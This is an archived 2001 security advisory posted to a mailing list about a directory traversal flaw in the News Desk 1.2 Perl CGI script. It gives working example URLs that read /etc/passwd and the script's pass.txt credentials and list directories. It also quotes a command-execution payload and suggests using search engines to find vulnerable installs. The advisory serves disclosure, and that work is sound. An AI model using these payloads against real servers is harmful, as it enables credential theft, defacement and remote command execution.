OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: B10Z Security (pathNS.SYMPATICO.CA)
Date: Wed Jan 03 2001 - 19:00:17 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Introduction:

    News Desk 1.2 (newsdesk.cgi) is a news
    submission script which is written in perl and allows
    someone on a remote computer to connect to the
    server and post news submissions without logging
    into the actual server. By logging into the cgi with a
    custom login and password (pass.txt) the admin is
    able to post the latest headline news to his/her
    website with ease.

    The Vendors website is:
    http://www.ibrow.com

    Problem:

    Adding the string "/../" to an URL allows an attacker to
    view any file on the server, and also list directories
    within the server which the owner of the vulnerable
    httpd has permissions to access.

    Examples:

    http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
    t=../../../../etc/passwd
    ^^ = Will obviously open the passwd file, if
    unshadowed.

    http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
    t=../pass.txt
    ^^ = Will open the password string which can be used
    to login to the newsdesk.cgi and post new news, or
    with special variables the ability to upload/post html to
    the htdoc's directory, possibly leading to a
    defacement of the webpage.

    http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?
    t=../../../../etc/
    ^^ = Will obviously list the /etc/ directory. Not all
    servers will list directories, but most apear to.

    Note: It depends on where they install newsdesk.cgi,
    not always in a cgi-bin, so it could be installed with
    any path. Just goto your favorite search engine and
    search for newsdesk.cgi and voila. There is also
    some other variants of this cgi script out there, most
    of them are noticeable by the news.cgi?
    a=something&t=meow.html format. Notice the a= &
    t= which is a clear give-away to Newsdesk.

    Solution:

    Vendor has been contacted. And will release a
    updated version which is supposed to be more
    secure...

    Special Thanks to:
    zenomorph <http://www.cgisecurity.com>

    Which contributed this:

    Remote command execution is possible on most
    sites if you use the correct directory syntax such
    as ../../../bin/ls%20/| is a working example, many
    more commands are possible if you play around with
    it a bit, such as spawning xterms.

    --------------------
    Found By:

    b10z cgi advisory.
    slipyb10z.net

    Found on December 10th, 2000.
    Posted to BugTraq Jan 3rd, 2001.